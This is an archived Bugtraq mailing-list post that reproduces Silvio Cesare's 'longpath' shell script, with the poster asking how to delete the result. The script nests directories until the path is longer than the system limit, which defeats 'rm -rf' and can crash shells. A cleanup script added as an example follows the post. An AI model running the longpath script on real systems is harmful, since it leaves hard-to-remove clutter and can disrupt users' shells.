Bugtraq mailing list archives

Re: in.telnetd bug (linux)


From: eszekely () UTTGM RO (Szekely-Benczedi Endre)
Date: Mon, 1 Jan 1996 16:37:01 +0200


        There is a nice small shell script at www.rootshell.com,
longpath.sh, which exploits some bug in Linux about long pathnames...

Here's the program:

#  Problem:  Long pathnames are possible (> MAXPATHLEN) by creating directory
#  trees relatively, causing various problems on the system.
#
#  May 27, 1997
#
#  Systems:  Linux, probably some other unix's also.
#
#  rm -rf will fail to remove it, as rm -rf will try to remove it using absolute
#  pathnames which are long.  If the current directory is in the prompt, then
#  this overflows, typically crashing the shell.  Any programs that use absolute
#  pathnames will have problems.
#
#
#  Silvio Cesare
#
#
# The longpath attack implementation..
#
#!/bin/sh
#
#  Implementation of the longpath attack
#  Silvio Cesare, 1997

LENGTH=128
HEIGHT=32
ROOT=longpath
CHAR=A

set -- `getopt h:l:r:c: $*`
if test $? != 0
then
        echo usage: longpath [-h height] [-l length] [-r root] [-c char]
        exit 1
fi
for i
do
        case "$i"
        in
                -h)
                        HEIGHT=$2
                        shift; shift
                        ;;
                -l)
                        LENGTH=$2
                        shift; shift
                        ;;
                -r)
                        ROOT=$2
                        shift; shift
                        ;;
                -c)
                        CHAR=$2
                        shift; shift
                        ;;
                --)
                        shift
                        break
                        ;;
        esac
done

NAME=""

i=0
while test $i -lt $LENGTH
do
        NAME=$NAME$CHAR
        i=`expr $i + 1`
done

mkdir $ROOT
cd $ROOT
i=0
while test $i -lt $HEIGHT
do
        mkdir $NAME
        cd $NAME
        i=`expr $i + 1`
done

I heard that it is possible to erase it with mc (Midnight Commander).
Well, I can tell you this ISN'T true ;-)
I tried the script on a RedHat Linux, and... well... I can't erase the
directory now ;-)
        I wonder if any of you knows the problem, and can help me with
that..
                                                10x
  ____________________________________________________________________
  |Szekely-Benczedi Endre     4339 Vargata nr.99, jud. Mures, ROMANIA|
  |E-mail: eszekely () felix uttgm ro WWW: http://www.uttgm.ro/~eszekely|
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
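
The script header above says rm -rf fails because it removes by absolute pathname. As an added example (not part of the original post or of Silvio Cesare's script), one way to clean up such a tree is to descend one relative component at a time and remove directories on the way back up; `rm_rel` and `remove_deep_tree` are hypothetical helper names, and a POSIX sh with `cd -P` is assumed.

```shell
#!/bin/sh
# Added example: remove a directory chain whose absolute path exceeds PATH_MAX
# by only ever using one-component relative names.

# Empty the current directory. Each subdirectory is entered in a subshell,
# emptied recursively, then removed from its parent by its short name.
rm_rel() {
    for e in * .[!.]* ..?*; do
        # Unmatched glob patterns stay literal; skip names that do not exist.
        [ -e "./$e" ] || [ -L "./$e" ] || continue
        if [ -d "./$e" ] && [ ! -L "./$e" ]; then
            # -P makes the shell chdir() to the relative name as given rather
            # than to a rebuilt absolute path that would be too long. Shells
            # may warn that getcwd() failed down there; that is harmless.
            ( cd -P "./$e" 2>/dev/null && rm_rel ) && rmdir "./$e" || return 1
        else
            # Plain files and symlinks are unlinked, never followed.
            rm -f "./$e" || return 1
        fi
    done
}

# remove_deep_tree ROOT  (hypothetical helper name)
# Assumes nobody is modifying the tree while it runs (no symlink-race handling).
remove_deep_tree() {
    [ -d "$1" ] && [ ! -L "$1" ] || { echo "not a directory: $1" >&2; return 1; }
    ( cd -P "$1" && rm_rel ) && rmdir "$1"
}
```

Each directory level costs one nested subshell, so the depth this can handle is bounded by the per-user process limit.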


